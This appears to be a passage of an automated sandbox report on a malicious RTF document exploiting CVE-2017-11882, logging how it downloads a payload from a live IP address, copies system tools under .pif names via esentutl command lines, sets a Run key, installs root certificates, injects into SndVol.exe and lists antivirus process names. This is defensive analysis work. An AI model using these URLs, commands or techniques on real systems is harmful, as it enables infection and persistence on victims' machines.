                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exe, Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Roaming\audiodg.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                  Source: K0hpP6V2fo.LNK.0.dr, LNK file: ..\..\..\..\..\Desktop\K0hpP6V2fo.rtf
                  Source: Window Recorder, Window detected: More than 3 window changes detected
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb,$ source: esentutl.exe, 00000008.00000003.393771298.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.8.dr
                  Source: Binary string: easinvoker.pdb source: audiodg.exe, 00000005.00000002.401375610.000000000DA67000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401375610.000000000DACA000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.379716518.000000007ED00000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400314447.0000000002D4E000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401375610.000000000DA97000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400087627.0000000001DD6000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbH source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: audiodg.exe, 00000005.00000002.401375610.000000000DA67000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401375610.000000000DACA000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401732992.000000000EB20000.00000004.00000800.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.379716518.000000007ED00000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400314447.0000000002D4E000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401732992.000000000EB4F000.00000004.00000800.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401375610.000000000DA97000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400087627.0000000001DD6000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.393771298.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.8.dr
                  Source: Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.395779355.0000000000550000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.9.dr

                  Data Obfuscation

                  Source: Yara match, File source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 5.2.audiodg.exe.1dd65a8.2.unpack, type: UNPACKEDPE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F7697 push ebp; ret 2_2_008F76A3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F7C96 push esi; ret 2_2_008F7C97
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F76B7 push ebp; ret 2_2_008F76C3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F76E7 push ebp; ret 2_2_008F76F3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F76FA push ebp; ret 2_2_008F7703
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008EE60B push ebp; ret 2_2_008EE60C
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F6008 push ebp; ret 2_2_008F600B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F5802 push ebx; ret 2_2_008F5803
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F6000 push ebp; ret 2_2_008F6003
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F6010 push ebp; ret 2_2_008F6013
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F7640 push ebp; ret 2_2_008F7643
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F5656 push ebp; ret 2_2_008F5657
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F5468 push esp; ret 2_2_008F546B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F6079 push ebp; ret 2_2_008F607B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F5674 push ebp; ret 2_2_008F568F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F6473 push edi; ret 2_2_008F653F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F5471 push esp; ret 2_2_008F5473
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F6071 push ebp; ret 2_2_008F6073
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F678A push esi; ret 2_2_008F678B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F6986 push esi; ret 2_2_008F6987
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F6782 push esi; ret 2_2_008F6783
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008EE5C3 push ebp; ret 2_2_008EE5C4
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008E01F4 push eax; retf 2_2_008E01F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F7710 push ebp; ret 2_2_008F7723
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F6F2C push esi; ret 2_2_008F6F33
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F6544 push edi; ret 2_2_008F6547
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008F6957 push esi; ret 2_2_008F6977
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Code function: 2_2_008E9165 push eax; retf 2_2_008E9171
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIF, Code function: 17_2_02D6D2F5 push 02D6D367h; ret 17_2_02D6D35F
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIF, Code function: 17_2_02D6D2FC push 02D6D367h; ret 17_2_02D6D35F
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIF, Code function: 17_2_02D463B0 push 02D4640Bh; ret 17_2_02D46403

                  Persistence and Installation Behavior

                  Source: C:\Windows\SysWOW64\esentutl.exe, File created: C:\Users\Public\alpha.pif (dropped file)
                  Source: C:\Windows\SysWOW64\esentutl.exe, File created: C:\Users\Public\xpha.pif (dropped file)
                  Source: C:\Windows\SysWOW64\esentutl.exe, File created: C:\Users\Public\Libraries\Qzzgbhha.PIF (dropped file)
                  Source: C:\Users\user\AppData\Roaming\audiodg.exe, Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                  Source: C:\Users\user\AppData\Roaming\audiodg.exe, Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exe (dropped file)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Roaming\audiodg.exe (dropped file)

                  Boot Survival

                  Source: C:\Windows\SysWOW64\esentutl.exe, File created: C:\Users\Public\alpha.pif (dropped file)
                  Source: C:\Windows\SysWOW64\esentutl.exe, File created: C:\Users\Public\xpha.pif (dropped file)
                  Source: C:\Users\user\AppData\Roaming\audiodg.exe, Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Qzzgbhha
                  Source: C:\Users\user\AppData\Roaming\audiodg.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                  Source: C:\Users\user\AppData\Roaming\audiodg.exe, Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\audiodg.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\audiodg.exe; Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIF; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIF; Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\esentutl.exe; Dropped PE file which has not been started: C:\Users\Public\xpha.pif
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3640; Thread sleep time: -60000s >= -30000s
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3228; Thread sleep time: -60000s >= -30000s

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIF; Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe
                  Source: C:\Users\user\AppData\Roaming\audiodg.exe; Process created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exe
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIF; Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 8B0000 protect: page execute and read and write
                  Source: C:\Windows\SysWOW64\esentutl.exe; File created: C:\Users\Public\alpha.pif
                  Source: C:\Users\user\AppData\Roaming\audiodg.exe; Thread APC queued: target process: C:\Windows\SysWOW64\SndVol.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\audiodg.exe "C:\Users\user\AppData\Roaming\audiodg.exe"
                  Source: C:\Users\user\AppData\Roaming\audiodg.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ahhbgzzQ.cmd" "
                  Source: C:\Users\user\AppData\Roaming\audiodg.exe; Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Roaming\audiodg.exe /d C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF /o
                  Source: C:\Users\user\AppData\Roaming\audiodg.exe; Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                  Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                  Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIF; Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                  Source: C:\Windows\SysWOW64\cmd.exe; Queries volume information: C:\ VolumeInformation
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp; Binary or memory strings: cmdagent.exe, quhlpsvc.exe, avgamsvr.exe, TMBMSRV.exe, Vsserv.exe, avgupsvc.exe, avgemc.exe, MsMpEng.exe

                  Stealing of Sensitive Information

                  Source: Yara match; File source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: audiodg.exe PID: 3780, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match; File source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: audiodg.exe PID: 3780, type: MEMORYSTR
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Command and Scripting Interpreter | 1 Valid Accounts | 1 Valid Accounts | 211 Masquerading | OS Credential Dumping | 1 Query Registry | Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 33 Exploitation for Client Execution | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 1 Valid Accounts | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 12 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 311 Process Injection | 1 Disable or Modify Tools | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 1 Modify Registry | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 123 Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Access Token Manipulation | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 311 Process Injection | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Deobfuscate/Decode Files or Information | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 2 Obfuscated Files or Information | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Install Root Certificate | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                  Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 DLL Side-Loading | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
                  Behavior Graph (ID: 1517947, Sample: K0hpP6V2fo.rtf, Startdate: 25/09/2024, Architecture: WINDOWS, Score: 100)

                  Source | Detection | Scanner | Label
                  K0hpP6V2fo.rtf | 47% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882
                  Source | Detection | Scanner | Label
                  C:\Users\user\AppData\Roaming\audiodg.exe | 100% | Joe Sandbox ML
                  C:\Users\Public\Libraries\Qzzgbhha.PIF | 100% | Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exe | 100% | Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exe | 32% | ReversingLabs
                  C:\Users\user\AppData\Roaming\audiodg.exe | 32% | ReversingLabs
                  C:\Users\Public\Libraries\Qzzgbhha.PIF | 32% | ReversingLabs
                  C:\Users\Public\alpha.pif | 0% | ReversingLabs
                  C:\Users\Public\xpha.pif | 0% | ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label
                  https://sectigo.com/CPS0 | 0% | URL Reputation | safe
                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe
                  http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
                  http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
                  http://ocsp.entrust.net03 | 0% | URL Reputation | safe
                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe
                  http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe
                  http://crl.entrust.net/server1.crl0 | 0% | Avira URL Cloud | safe
                  http://107.175.243.142/340/audiodg.exe | 100% | Avira URL Cloud | malware
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | Avira URL Cloud | safe
                  http://107.175.243.142/340/audiodg.exej | 0% | Avira URL Cloud | safe
                  http://107.175.243.142/340/audiodg.exellC: | 0% | Avira URL Cloud | safe
                  http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | 0% | Avira URL Cloud | safe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | Avira URL Cloud | safe
                  http://www.diginotar.nl/cps/pkioverheid0 | 0% | Avira URL Cloud | safe
                  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | 0% | Avira URL Cloud | safe
                  https://maan2u.com/doc/233_QzzgbhhaamlKd | 0% | Avira URL Cloud | safe
                  http://ocsp.entrust.net0D | 0% | Avira URL Cloud | safe
                  http://www.pmail.com | 0% | Avira URL Cloud | safe
                  https://maan2u.com/doc/233_Qzzgbhhaaml | 0% | Avira URL Cloud | safe
                  http://ocsp.sectigo.com0C | 0% | Avira URL Cloud | safe
                  https://secure.comodo.com/CPS0 | 0% | Avira URL Cloud | safe
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  maan2u.com | 112.137.173.77 | true | true | | unknown
                    Name | Malicious | Antivirus Detection | Reputation
                    http://107.175.243.142/340/audiodg.exe | true | Avira URL Cloud: malware | unknown
                    https://maan2u.com/doc/233_Qzzgbhhaaml | true | Avira URL Cloud: safe | unknown
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://107.175.243.142/340/audiodg.exej | EQNEDT32.EXE, 00000002.00000002.380237258.00000000008DF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
